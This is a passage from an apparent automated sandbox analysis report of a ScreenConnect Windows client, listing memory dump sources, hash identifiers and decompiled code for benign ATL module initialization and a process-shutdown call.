                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                          • String ID:
                                                                          • API String ID: 2633735394-0
                                                                          • Opcode ID: f14ab510739124f7fe63848341080ae958cc2f5809c55b2e9c9e0af2bdbeeed2
                                                                          • Instruction ID: 3c164813b6f8917902c5dff5fc36945476cfe8ee65b8a69815039dd7db542985
                                                                          • Opcode Fuzzy Hash: f14ab510739124f7fe63848341080ae958cc2f5809c55b2e9c9e0af2bdbeeed2
                                                                          • Instruction Fuzzy Hash: 0B01E93205010DBBCF135F55CD01EEA3BBAEF58754F159415FA58A5121C336E871DBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 003F1A59, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E003F1A59(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t13;

				_t13 = __ecx;
				E003F1AAC(__ecx);
				 *__ecx = 0x38;
				 *((intOrPtr*)(__ecx + 8)) = 0x3f0000;
				 *((intOrPtr*)(__ecx + 4)) = 0x3f0000;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xc00;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x3fe1f8;
				if(E003F1040(__ecx + 0x14) < 0) {
					if(IsDebuggerPresent() != 0) {
						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
					}
					 *0x405f5c = 1;
				}
				return _t13;
			}




                                                                          0x003f1a5a
                                                                          0x003f1a5c
                                                                          0x003f1a66
                                                                          0x003f1a6f
                                                                          0x003f1a72
                                                                          0x003f1a75
                                                                          0x003f1a7c
                                                                          0x003f1a8a
                                                                          0x003f1a94
                                                                          0x003f1a9b
                                                                          0x003f1a9b
                                                                          0x003f1aa1
                                                                          0x003f1aa1
                                                                          0x003f1aab

                                                                          APIs
                                                                            • Part of subcall function 003F1AAC: _memset.LIBCMT ref: 003F1AB9
                                                                            • Part of subcall function 003F1040: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,003F1111,00402E3C,?,003F1111,8007000E,?,?,?,00000000,003FD170,000000FF,?,003F15CD,00000000), ref: 003F1043
                                                                            • Part of subcall function 003F1040: GetLastError.KERNEL32(?,00000000,003F1111,00402E3C,?,003F1111,8007000E,?,?,?,00000000,003FD170,000000FF,?,003F15CD,00000000), ref: 003F104D
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,003F100A), ref: 003F1A8C
                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,003F100A), ref: 003F1A9B
                                                                          Strings
                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 003F1A96
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.1191250625.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                                                                          • Associated: 00000009.00000002.1191088158.00000000003F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1191881743.00000000003FE000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192167597.0000000000404000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000009.00000002.1192433110.0000000000408000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3f0000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString_memset
                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                          • API String ID: 436010757-631824599
                                                                          • Opcode ID: 04f7e63ecf61ec70d9781123b83432752a461d064e89ecf51263b6032965e92f
                                                                          • Instruction ID: 8952ea8b2f36f065e4fa6ce64c14b5e49a19698ee81a6c6fd34853ccfa6ab832
                                                                          • Opcode Fuzzy Hash: 04f7e63ecf61ec70d9781123b83432752a461d064e89ecf51263b6032965e92f
                                                                          • Instruction Fuzzy Hash: ABE09274600796CFE723AF3AE9047667BE8AF00344F00895CE65AC6361EBB5D444CFA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Analysis Process: ScreenConnect.WindowsClient.exe PID: 5196 Parent PID: 6356 ScreenConnect.WindowsClient.exeCOMMON

                                                                          Executed Functions

                                                                          Function 00007FFA36323502, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 520 7ffa36323502-7ffa3633560d SetProcessShutdownParameters 523 7ffa3633560f 520->523 524 7ffa36335615-7ffa36335643 520->524 523->524
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1212724101.00007FFA36320000.00000040.00000001.sdmp, Offset: 00007FFA36320000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_7ffa36320000_ScreenConnect.jbxd
                                                                          Similarity
                                                                          • API ID: ParametersProcessShutdown
                                                                          • String ID:
                                                                          • API String ID: 4192036408-0
                                                                          • Opcode ID: 6db1467760e465c1d8ebbd9d6c8abd05d34f258e8df59c1b8a0dd3a8a10c14d7
                                                                          • Instruction ID: 3cbeee1ff25349057087fdec9d32b010f3886c2f7733400f1d1fa3d033c2e4b7
                                                                          • Opcode Fuzzy Hash: 6db1467760e465c1d8ebbd9d6c8abd05d34f258e8df59c1b8a0dd3a8a10c14d7
                                                                          • Instruction Fuzzy Hash: BB21D63190860C9FEB14EF98D84A7F977E4EB59321F10812ED44DC3216DA74A846CB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions